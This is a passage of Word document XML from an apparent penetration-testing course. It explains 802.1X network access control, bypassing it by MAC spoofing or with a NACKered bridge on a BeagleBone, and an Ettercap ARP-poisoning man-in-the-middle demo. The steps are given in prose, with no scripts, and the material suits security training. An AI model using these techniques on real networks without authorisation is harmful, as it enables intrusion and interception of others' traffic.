      <w:r w:rsidR="004A10BF">
        <w:t xml:space="preserve"> then allow</w:t>
      </w:r>
      <w:r w:rsidR="00DF2AEF">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="004A10BF">
        <w:t xml:space="preserve"> to connect to the real company’s Wi-Fi.</w:t>
      </w:r>
      <w:r w:rsidR="00236267">
        <w:t xml:space="preserve"> Last but not least, VoIP and printers can also be targeted by an attacker as they are often unsuspected attack vector</w:t>
      </w:r>
      <w:r w:rsidR="008A7332">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00236267">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008512CC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2988B155" w14:textId="138CCCC4" w:rsidR="004C325A" w:rsidRDefault="004C325A" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>NAC Bypassing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B983114" w14:textId="0853BD5F" w:rsidR="00AF3056" w:rsidRDefault="00F31491" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>802.1X Network Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648346F1" w14:textId="4011AD53" w:rsidR="00AA0B8C" w:rsidRDefault="00AA0B8C" w:rsidP="00AA0B8C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Network Access Control</w:t>
      </w:r>
      <w:r w:rsidR="00F31491">
        <w:t xml:space="preserve"> (NAC) </w:t>
      </w:r>
      <w:r>
        <w:t>is a solution to prevent unauthorized access to a network by restricting access based on device identity or security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB72078" w14:textId="2B6118AE" w:rsidR="008F663F" w:rsidRDefault="008F663F" w:rsidP="00AA0B8C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>NAC first needs to detect when a new device connects to the network. This is achieved using multiple techniques such as DCHP Proxy (to intercept DHCP requests), listeners, client-</w:t>
      </w:r>
      <w:r w:rsidR="00877B3E">
        <w:t>based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00877B3E">
        <w:t>software</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (to perform endpoint security) or SNMP trap to </w:t>
      </w:r>
      <w:r w:rsidR="00877B3E">
        <w:t>gather</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> new MAC address</w:t>
      </w:r>
      <w:r w:rsidR="00155553">
        <w:t>es</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FCA4D3" w14:textId="1406DB7A" w:rsidR="00E8481F" w:rsidRDefault="00E8481F" w:rsidP="00AA0B8C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once a device has been detected by the NAC solution, it then checks if this device complies with the </w:t>
      </w:r>
      <w:r w:rsidR="001C053B">
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> policy (is the anti-virus up to date? Has the system been patched? …)</w:t>
      </w:r>
      <w:r w:rsidR="008A5A31">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009C4C65">
        <w:t xml:space="preserve"> If everything is in order, NAC authorizes the device to connect to the network.</w:t>
      </w:r>
      <w:r w:rsidR="0043637E">
        <w:t xml:space="preserve"> Nevertheless, if </w:t>
      </w:r>
      <w:r w:rsidR="00EF1170">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="0043637E">
        <w:t>NAC</w:t>
      </w:r>
      <w:r w:rsidR="00EF1170">
        <w:t xml:space="preserve"> solution</w:t>
      </w:r>
      <w:r w:rsidR="0043637E">
        <w:t xml:space="preserve"> failed to </w:t>
      </w:r>
      <w:r w:rsidR="004315DB">
        <w:t>detect</w:t>
      </w:r>
      <w:r w:rsidR="0043637E">
        <w:t xml:space="preserve"> a connec</w:t>
      </w:r>
      <w:r w:rsidR="009B1A04">
        <w:t>ted device, it can be bypassed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F317B1" w14:textId="499C545A" w:rsidR="00F31491" w:rsidRPr="00AA0B8C" w:rsidRDefault="00F31491" w:rsidP="00AA0B8C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r w:rsidRPr="00F31491">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="41EEC357" wp14:editId="25768678">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-1052</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3376295" cy="2155190"/>
            <wp:effectExtent l="190500" t="190500" r="167005" b="16891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6295" cy="2155190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:effectLst>
                      <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
                        <a:srgbClr val="000000">
                          <a:alpha val="70000"/>
                        </a:srgbClr>
                      </a:outerShdw>
                    </a:effectLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E356984" w14:textId="349A2A1D" w:rsidR="00AF3056" w:rsidRDefault="00AF3056" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Ref520290008"/>
      <w:r>
        <w:t>Basic NAC Bypass</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="286FF82C" w14:textId="7D780C3C" w:rsidR="00280CC1" w:rsidRDefault="00A76BDF" w:rsidP="00280CC1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>VoIP phones do not have security endpoints and NAC is performed using the MAC address. If an attacker manage to get the phone MAC address (a lot of information can be gathered just by checking phone settings…), it is easy to change his MAC address</w:t>
      </w:r>
      <w:r w:rsidR="007C7EA8">
        <w:t xml:space="preserve"> and to bypass the NAC solution (with the </w:t>
      </w:r>
      <w:r w:rsidR="007C7EA8" w:rsidRPr="00803269">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>macchanger</w:t>
      </w:r>
      <w:r w:rsidR="007C7EA8">
        <w:t xml:space="preserve"> command for example).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1419901E" w14:textId="50F90C74" w:rsidR="004130AA" w:rsidRDefault="004130AA" w:rsidP="00280CC1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="666E9138" w14:textId="7711B84E" w:rsidR="00AF3056" w:rsidRDefault="006F3620" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Beagle Board and the NACKered project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0561CA72" w14:textId="77777777" w:rsidR="0005088C" w:rsidRPr="00A96C1D" w:rsidRDefault="0005088C" w:rsidP="0005088C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r w:rsidRPr="00A96C1D">
        <w:t xml:space="preserve">NACKered is a bash script developed by </w:t>
      </w:r>
      <w:r w:rsidRPr="0052340E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>p292</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C1D">
        <w:t>, which mostly copied Alva Lease ‘Skip’ Duckwall IV’s work presented at DEFCON 19 (“A Bridge Too Far”).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A03AC7" w14:textId="77777777" w:rsidR="0005088C" w:rsidRPr="00D95A13" w:rsidRDefault="0005088C" w:rsidP="0005088C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r w:rsidRPr="00A96C1D">
        <w:t xml:space="preserve">The goal of this project is to bypass NAC authentication on a 802.1X network by spoofing a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D95A13">
        <w:t>legitimate host. It also enables an attacker to remain invisible on a network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FBA316" w14:textId="77777777" w:rsidR="0005088C" w:rsidRPr="00D95A13" w:rsidRDefault="0005088C" w:rsidP="0005088C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Nackered performs the following operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D95A13">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C07FDD" w14:textId="77777777" w:rsidR="0005088C" w:rsidRDefault="0005088C" w:rsidP="0005088C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D95A13">
        <w:t>Disable IPv6 (Clearing DNS cache has been removed in our version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774767C3" w14:textId="77777777" w:rsidR="0005088C" w:rsidRDefault="0005088C" w:rsidP="0005088C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D95A13">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Enable EAPOL packets forward by </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D95A13">
        <w:t>kernel and enable bridge-nf-call-iptables to allow the bridge to send packets through iptables. Enable IPv4 packets forward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430B6911" w14:textId="28C0609E" w:rsidR="0005088C" w:rsidRPr="00D95A13" w:rsidRDefault="0005088C" w:rsidP="0005088C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D95A13">
        <w:t>Setup the bridge between the victim and the switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA8240" w14:textId="77777777" w:rsidR="0005088C" w:rsidRDefault="0005088C" w:rsidP="0005088C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>By now, the victim machine should be able to send packets again. Traffic is captured on the BeagleBone with tcpdump to gather the victim’s IP and MAC addresses and the gateway’s MAC address. This step can take some time. Then:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359E084C" w14:textId="77777777" w:rsidR="0005088C" w:rsidRDefault="0005088C" w:rsidP="0005088C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C07B23">
        <w:t xml:space="preserve">Drop all output traffic except connections to </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C07B23">
        <w:t>Attacker’s IP, to become invisible (but still keep the SSH session).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA87ECB" w14:textId="77777777" w:rsidR="0005088C" w:rsidRDefault="0005088C" w:rsidP="0005088C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C07B23">
        <w:t>Rewrite any frames with switch side MAC on switch interface or bridge interface with victim’s MAC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA1BAFB" w14:textId="77777777" w:rsidR="0005088C" w:rsidRDefault="0005088C" w:rsidP="0005088C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C07B23">
        <w:t>Set an IP for the bridge (to be able to SNAT traffic during next step)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECDF61B" w14:textId="77777777" w:rsidR="0005088C" w:rsidRDefault="0005088C" w:rsidP="0005088C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C07B23">
        <w:t>Setup rules to rewrite all TCP / UDP / ICMP traffic incoming from the attacker machine (connected through Wi-Fi) and from the BeagleBone with the IP and the MAC of the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF11AA8" w14:textId="272D3D33" w:rsidR="0005088C" w:rsidRDefault="0005088C" w:rsidP="0005088C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Re-enable traffic on Layer 2 and 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D918C19" w14:textId="5BAACC43" w:rsidR="0001568F" w:rsidRDefault="0001568F" w:rsidP="0001568F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C4D531" w14:textId="37242B4D" w:rsidR="00EA78A8" w:rsidRDefault="00EA78A8" w:rsidP="00950DFD">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47C6CE61" wp14:editId="298D139C">
            <wp:extent cx="4287520" cy="2398395"/>
            <wp:effectExtent l="190500" t="190500" r="189230" b="1924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etwork_NAC_bypass_NACKered.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4287520" cy="2398395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:effectLst>
                      <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
                        <a:srgbClr val="000000">
                          <a:alpha val="70000"/>
                        </a:srgbClr>
                      </a:outerShdw>
                    </a:effectLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF5ECC8" w14:textId="77777777" w:rsidR="00EA78A8" w:rsidRDefault="00EA78A8" w:rsidP="006F3620">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A1F61DD" w14:textId="1139003B" w:rsidR="00EA78A8" w:rsidRPr="006F3620" w:rsidRDefault="00692671" w:rsidP="006F3620">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1D69C596" wp14:editId="6E6DA397">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>118745</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>430612</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3913505" cy="2934970"/>
            <wp:effectExtent l="190500" t="190500" r="182245" b="18923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nected_BeagleBon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13505" cy="29349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F3091">
        <w:t xml:space="preserve">Which gives on a real case </w:t>
      </w:r>
      <w:r w:rsidR="00E5723C">
        <w:t>(the blue Ethernet wire is connected to the switch, the black one is the legitimate host)</w:t>
      </w:r>
      <w:r w:rsidR="005D30B5">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678569C0" w14:textId="3FF6FE0B" w:rsidR="00692671" w:rsidRDefault="00692671" w:rsidP="00AF3056">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B24974A" w14:textId="09B09A58" w:rsidR="00AF3056" w:rsidRDefault="00692671" w:rsidP="00AF3056">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once the BeagleBone is connected, the attacker can connect to it </w:t>
      </w:r>
      <w:r w:rsidR="008F3091">
        <w:t>thanks to the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wi-Fi </w:t>
      </w:r>
      <w:r w:rsidR="008F3091">
        <w:t xml:space="preserve">access point </w:t>
      </w:r>
      <w:r w:rsidR="00950DFD">
        <w:t>and run the nackered.sh script to access to restricted LAN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5081D6B6" w14:textId="77777777" w:rsidR="00B62B06" w:rsidRPr="006B2E1A" w:rsidRDefault="00B62B06" w:rsidP="006B2E1A">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7569A4B4" w14:textId="6DDDCC7A" w:rsidR="004C325A" w:rsidRDefault="004C325A" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Network protocols used during a pentest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FA486C" w14:textId="2DB8230A" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A43AA75" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>ARP Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EF1A01" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Address Resolution Protocol (ARP) is a stateless protocol used to resolve IP addresses to MAC addresses. When someone broadcast on the network that it has a specific IP address, other hosts on the network will update their ARP cache with this information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC5677E" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The goal of an ARP poisoning attack is to impersonate a host (such as a switch) and act as a man-in-the-middle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231FF90F" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251739136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50F48016" wp14:editId="5C5BD599">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1814</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2857500" cy="2181225"/>
            <wp:effectExtent l="0" t="0" r="95250" b="6667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00px-ARP_Spoofing.svg.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2857500" cy="2181225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:effectLst>
                      <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
                        <a:srgbClr val="000000">
                          <a:alpha val="70000"/>
                        </a:srgbClr>
                      </a:outerShdw>
                    </a:effectLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>With this position as MITM, every packet will pass through the attacker machine. Hence, the hacker can gather information and even alter packets on the fly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA27557" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Ettercap is a privileged tool to perform ARP poisoning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7C499F" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">          DEMO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E212962" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251740160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="676E14A5" wp14:editId="3CAE6CD5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>355328</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2840990" cy="1783715"/>
            <wp:effectExtent l="190500" t="190500" r="187960" b="19748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rp-poisoning-etterca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0990" cy="17837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The attacker is on the same subnet than the windows machine. Launch Ettercap on eth0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593D7F86" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27521950" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251741184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7483E66B" wp14:editId="519DD2F2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>271780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3559175" cy="2308225"/>
            <wp:effectExtent l="190500" t="190500" r="193675" b="18732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niffing_start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59175" cy="23082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Then scan the network (using ARP) to get the active hosts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A1DF8B" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="440983EE" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251742208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="365E92F8" wp14:editId="3EB5E851">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>20320</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>746579</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4287520" cy="678180"/>
            <wp:effectExtent l="190500" t="190500" r="189230" b="19812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rp-poisoning.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7520" cy="678180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:effectLst>
                      <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
                        <a:srgbClr val="000000">
                          <a:alpha val="70000"/>
                        </a:srgbClr>
                      </a:outerShdw>
                    </a:effectLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Once hosts have been identified, start a Man-In-The-Middle attack between the windows host (192.168.21.20) and the gateway (192.168.21.254). Note that the attacker MAC address ends in “b5:02:f5”. This will send ARP packet to poison ARP cache of the windows machine along with the gateway ARP cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C171049" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BD89DA7" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251743232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="571526CD" wp14:editId="50F267C9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>325902</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>481477</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3559175" cy="2708910"/>
            <wp:effectExtent l="190500" t="190500" r="193675" b="18669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rp-poisoning-mitm.PNG"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId20">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="2031" t="2950" r="1743" b="2500"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
